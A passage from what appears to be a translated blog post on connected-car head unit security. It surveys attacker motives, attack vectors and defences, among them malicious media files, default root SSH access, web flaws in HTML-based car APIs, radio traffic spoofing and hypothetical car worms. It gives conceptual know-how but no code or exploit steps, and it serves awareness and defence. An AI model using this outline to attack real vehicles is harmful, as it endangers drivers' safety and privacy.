<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Car security is similar to APC/SCADA security except that our PLCs (ECU) are connected to smartphone (HU) with Internet access.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Summarizing all my ”analytics” I can conclude that </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HU is the most desired and useful target</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> but for sure there are many other possibilities like baseband GSM modem, Wireless TMPS, direct access to CAN (local attack), attack on sensors and radars and so on. In other words car security includes not only IoT security.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">What would be the use?</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Before we go on I would like to raise a good question - why anyone in the world is interested to hack our long-suffering car? There are several alternatives:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1) Spying on a specific person. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For example someone wants to spy on all his/her movements without any taps. Certainly taps only duplicate car functionality: GPS, GSM, Wi-Fi and BT. The only thing is needed - install software and it can be done remotely. I think that price of such attack is still too high but for sure: car system’s architecture and design gives such an opportunity. Besides, ConnectedCar can be attacked from the Internet without physical interaction with the car (I will return to this theme a little bit later). And as I don't want to produce many paragraphs I will also add unauthorized access to car payment features to this point. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2) Devastating actions</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This point is rather uncertain but imagine ABS is turned off at specific moment - it is rather dangerous. Imagine another dangerous scenario: all car electronics is disabled by a railgun on high speed during sharp turn. Such things have already happened by accident (electromagnetic interference from base stations was the fault). We can possibly get same results if we disable ECU programmatically. But of course such scenario is better suitable for some action movie.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">3) Unauthorized physical access</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Car theft is rather obvious vector but it is more connected with local physical attacks and local network vulnerabilities. Nevertheless MiTM attack that allow to open car doors has been shown in practice. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's talk about vectors that are not so obvious:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">4) Route tampering.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Self-driving cars are still on testing and revision stage but even without this super-feature we can tamper a route if driver trusts everything navigator is saying. So if the navigator says that the road is closed or there is a traffic jam and it's better to choose another route, the driver might follow its advice.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">5)"Locker"</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When we discussed these issues on 21th DefconRussia meetup - </span><a href="http://www.slideshare.net/AlexeySintsov/backdooring-a-car" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.slideshare.net/AlexeySintsov/backdooring-a-car</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, the "locker" idea of monetisation was put forward jokingly. Imagine you are getting into the car, starting it and see ransom demands on hell-red screen to send money in order for HU to be unlocked. Funny that "locker" can really lock doors and windows of your car :). In case of some popular vulnerability or unscrupulous MRO centres this scheme might work.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">That's enough for a start, I think it’s easy to invent even more good applications.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attack vectors on HU</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this part we will talk about attack schemes. Mind you that I will describe them in theory but many of them were applied in practice. I can't tell about that part of my work because of NDA but I will make a review of attack vector types to make you aware of possible attacks in theory. Let's start from HU structure. Usually it is a box connected to various boards, displays and sensors that contains GSM/3G modem, card/USB plug, Bluetooth device, etc. Inside the box there is RAM, ROM and CPU, usually on AMR chip. There runs fancy OS that controls navigation, some cabin elements (for example, door locks or window raiser), video/mp3 elements and sometimes even has a web-browser. I'd like to add that HU may vary from one manufacturer to another and from one generation to another. Some of them have several CPUs and OSs, some even have hypervisor and OS with all user data virtualized. I am certain that German auto industry follows a course of protecting car crucial resources from user processes but this path is thorny. In the simplest case there will be only general- purpose OS, but as I have mentioned, HU still isolated at network level.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/f91/371/808/f91371808056409c94c7855f40f75c1a.jpg" height="443px;" src="https://lh5.googleusercontent.com/sqBn9U-7Lt-dPXErSJ-5lN_AGDcFxhQQQvkN9cRzOW1oPLi4rsOWW4VVwxa8mGir2tES0TlGSDi0ovqKGUVW6EhDz_KdrXoV3GIPtrevG9aJzkCJiPwPONWsaWOSmaRgOb3TiEAzEpp7imZA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">OS type can vary, I've already mentioned QNX, Linux, etc. Real-time OS is not necessary for IVI if there are no specific tasks requiring it (and such tasks are rare), but QNX is used by several manufacturers (HARMAN is a striking example). GENVI and Tizen are examples of manufacturers that use Linux. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's talk about network level isolation. HU is connected to OBD that is connected to a switch. Usually it also has access to audio and phone systems (MOST bus is used here) and sometimes direct connections to some ECUs via CAN. Where the attacker should make efforts in order to hack HU?</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Local interfaces.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Let's start from the simplest - local interfaces allow us to interact with OS services and applications. This vector seems doubtful: the attacker should somehow get access to these interfaces. But it should be taken into account that many "secrets" are hidden on client's device, certificates and passwords can be shared and can be default for all devices of that system class. Yes, Security Through Obscurity approach is widespread in car industry :). Besides this target you can perform hybrid attack on local interfaces - source of an attack can be remote but penetration is made on a local HU. For example you have downloaded mp3 file with tags (that contains BoF exploit), loaded it into HU and launched it. BoF gets to tag parser and the backdoor is installed (here is the example - </span><a href="http://www.itworld.com/article/2748225/security/with-hacking--music-can-take-control-of-your-car.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.itworld.com/article/2748225/security/with-hacking--music-can-take-control-of-your-car.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">). Card updates, POI, fake updates can be used similarly as well. Besides "file parsing error" attacks there are some interesting ways to exploit errors in logic of updates installation, for example, updates for navigation maps. Local interfaces concept can be applied on Bluetooth, USB and Wi-Fi hotspot (yes, such feature exist too!), not only for files and import. Also EthrenetOverUSB turned out to be a very popular solution. In other words USB plays the role of Ethernet interface to local ethernet network of the car. One can connect via SSH as root (remember that password is default) and it's all over. The same thing is for Wi-Fi hotspot - once HU creates such hotspot it can open SSH port for connection. And I'll repeat that it's not just guesses, anyone can check that (for example, Toyota and Mazda fans have already found such hack - </span><a href="http://www.mazda3hacks.com/doku.php?id=notes:sshnotes" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.mazda3hacks.com/doku.php?id=notes:sshnotes</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) I have seen that in other vendors' cars too. So I'm waiting when hackers will find more of this and for sure they will!</span></div>
<b id="docs-internal-guid-2ccdc29c-bc7b-6e97-61dc-11d7f28f4e69" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Attack via applications in the name of IoT.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The most interesting vector (for me) is attack from the Internet. There are a large amount of opportunities and it is permanently growing. Let’s start with classical client-side attack on browser and its plugins. Yes, it's trendy now to have browser in the car, which can read PDFs and Word documents! It could be a WebKit assembly or Chrome, so you can see common problems and difficulties. In addition in some cases browser can be run as root. That's OK (except running browser as root, I refuse to understand it). There are also many applications that use Internet and services like Facebook or navigation in addition to web-browser.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> I would like to say some words about HTML5 security and WEB technologies, somehow they were made "embedded" and have become the basis for all ConnectedCar operation logic. And now imagine the consequences of SSRF/CSRF or XSS. Suppose HU interface and other applications are based on HTML+JS, if there is XSS, we can get access to internal API: get car location, VIN, fuelling, current speed and other data from sensors which is available through API. If we have SSRF/CSRF we can interact with internal API and control some things inside the car (if not ECU than navigation logic, profiles and applications) or develop attacks on internal components (privilege escalation). It is rather unpleasant taking into account that ConnectedCar services includes remote manipulation and access to data. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's take up the recent case of BMW hacking - </span><a href="http://m.heise.de/ct/artikel/Beemer-Open-Thyself-Security-vulnerabilities-in-BMW-s-ConnectedDrive-2540957.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://m.heise.de/ct/artikel/Beemer-Open-Thyself-Security-vulnerabilities-in-BMW-s-ConnectedDrive-2540957.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The problem was that the crucial traffic was encrypted with symmetric-key algorithm, and the key could be retrieved using reverse engineering methods. The key was the same for all cars (shared secret) and while you get the key from one car you can use it in other cars confidently. In addition all commands were sent over HTTP, SSL was not used. That allows spoofing, emulating command of door opening and performing MiTM attacks. You can read more if you follow the link.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/91a/30a/c37/91a30ac375e646e9a41770bf863f8e78.png" height="424px;" src="https://lh5.googleusercontent.com/dj5XJZqFMDJjl7zkjKliTmJGyX6Vtxb3itS5MgHmpO5mBmkKtKtM6cBCKrD9CP6sbqJuScsxwf0Z8rkD5vsDEzj7LaUFLCI3wzSWW4y529z8LT3f3WzXxIu3wcHOyOJoubpVBRf0AVypnWPU" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Various attack vectors</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> RDS Spoofing</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> RDS/TMC parsing is often performed by navigation software in HU. The most popular problem is obvious spoofing - </span><a href="https://www.blackhat.com/presentations/bh-usa-07/Barisani_and_Bianco/Presentation/bh-usa-07-barisani_and_bianco.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.blackhat.com/presentations/bh-usa-07/Barisani_and_Bianco/Presentation/bh-usa-07-barisani_and_bianco.pdf</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. TMC data is not encrypted and is transferred as is (the problem is solved only for "commercial" radio stations, where private keys are used). Thus any hacker with HackRF can spoof broadcasted traffic reports. Also you can do some fuzzing and use vulnerabilities in format parsing. Though TMC is unhappy target for fuzzing, but there is a nonzero probability to find something like BoF in Radio Text.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> v2v</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I'd like also to say something about v2v technology. I like the idea of the worm that will be copied from one car to another. For example, Wi-Fi (IEEE 802.11p) maybe the way to implement it. I hope that by time it will be widely distributed they will learn not to assign service’s interfaces to 0.0.0.0 and not to open SSH ports, otherwise interesting worm samples will be created:)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/5b3/f21/b95/5b3f21b951b64a2595a0de82b29d5266.jpg" height="390px;" src="https://lh3.googleusercontent.com/qooY20JUpD3IykCP-L-5FpN8O-sX12aJ003D3HLQ9IIBeblcLw8WTu2PMWzrBHhLQAjL3EhmgLqYnVSbkiSCLnjJphHV-36tLxxcFT8xjL2VvhjdOJdtzJBVgyAdhFjAc84tqT2uZuGvb-zd" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The dream of future virus maker...</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hybrid worm</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">While talking about car worms on DefconRussia other funny vectors were presented like exploiting software in car service centres (MRO). Imagine, while the technician is examining the car, that car infects technician's workstation using vulnerabilities in car diagnostic software. Next client is arriving to service centre and now the technician infects his or her car. I'd like to add that IVI/HU of one family and generation can be installed on different cars (even vendors) which make our hypothetical worm's task much easier.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Internet services security is also an interesting subject. If you control Internet proxy of ConnectedCar or its API backend which is located in the Internet than you control all ConnectedCar traffic: updates, registration and other features. Once again, ConnectedCar and HU security issues are similar to mobile security. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/b89/448/85e/b8944885ed014a078c54a7d82cabcf2c.png" height="467px;" src="https://lh4.googleusercontent.com/WCjXwhP0hZXVSi3JzceHf_o2pa7rqneJbKP4Pc8CeHIkXUAtK7MpmATltHIQUFlxhTur7tKll30tzfOHHBNUDzKBWzwmBY_HnEcBo6-g8raq-ce9SoVYw88bLgoWPLAxofcuxzAZhQbvlQIw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Worm concept in theory.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Future is coming - cars without a driver.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And now for something you have seen only in fiction before - robotic cars. All world is waiting for the self-driving cars will be completely introduced at 2040. So today we are creating basis for future engineers and security topic are not on the last place. By that time attack vectors and their profit will change. It is hard to predict what will be HU like at 2040, but we can assume that decision making and navigation algorithms won’t change completely. I hope that by 2040 all these things that were showed on conferences nowadays will become ordinary and obligatory for vendors in the future (and, of course, mitigated). I’ve talk to some information security experts in automotive industry, including German manufacturers, and I assure you that they are up to date on all hacking techniques and definitely are on the right track (but can’t say for all of course).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/f8d/64d/af5/f8d64daf51484b45a6b4343f42107860.jpg" height="344px;" src="https://lh3.googleusercontent.com/rjjahMb9MQ61uafi0slIx1TCVZdnF8w9Pxu5Ntw5b3uBfdlOz1GY90R552erQk5QqJaz-hcdUPis_gzarPYxN-mT8KRfyvAXNkEsR38zQLDs7L_s2QnPxLGr7cd8xkQfU7msJFbAnCPZTx1z" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="600px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is the future as I see it.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Is it so bad as it seems? Have at you now!</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now I would like to talk about basic protection techniques of HU and car network. They are quite diverse because some manufacturers see one group of threats and some see another. For example, it is important for client HU to get updates. If some bug is found, the update of all firmware or some component should be installed (otherwise recall of all car lot will cost a pretty penny, so updates over-the-air is a good idea). Of course this update process must be secured as well by using digital signatures, certificates and so on. Anyway the progress in this area is made and almost all cars will have update-over-the-air and that's good. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There is a trend towards OS isolation from network and hardware resources. Isolation can be expressed differently: from network segmentation up to full OS virtualization. But problems persists and if OS needs access to door lock ECU, cruise control or OBD-II it will get it, hence there is a way to control door locks, drive mode and get other information about car state. Virtualization hasn't entered our lives completely yet and today we have quite common problems: absence of ASLR/NX, improper access permissions to local files and so on. Keychain is not installed everywhere and many applications have to store secret keys at HU’s filesystem. So secure storage is in demand from IVI in same way as from smartphones. Have nothing to say about SELinux - I understand that it demands too much resources for embedded system and I have not seen it on IVI. Also I can't see the reason to have SSH on HU at production stage (but it is worth to say that situation started to turn and now it's more and more difficult to find SSH. Now developers turn it on only during the release stage for their own purposes). A lack of hardening is becoming obvious - when you see web browser runs as root (but to be honest and fair, developers are fixing these kind of issues on very early stage of development, so should be rare in production now). </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As an aside, it is worth mentioning problem of integrity. From my point of view even if someone have executed malicious code on HU, he or she shouldn't been given any chance to save a backdoor even with root privileges. Some manufacturers ignore this problem and makes it possible to mount filesystem in rw mode, but some IVIs will reboot with any attempt to change anything in its configuration.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.6666666666667px; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Virtualization</b></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's talk about virtualization as a solution to all problems. One of the fundamental protection policies for OS with entertainment applications, as I've said before, is virtualization. I think that in N years it will be applied by all manufacturers in some way. Advantages are clear: app OS will be isolated from the main vehicle system and “important system” OS, including isolation on network level. But if such app OS will be compromised attacker still can get some valuable data. First of all, it will be user data that is processed on that level. That’s enough to consider this attack as successful - because you are getting all data from the sensors: the location, the endpoint, application data; at least Facebook access token worth hacking HU! Secondly, some API, for example, display UI will be still accessible from virtualized OS and that will allow to continue attack "down". Virtualization approach seems right to me because it complicates tasks of attacker.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
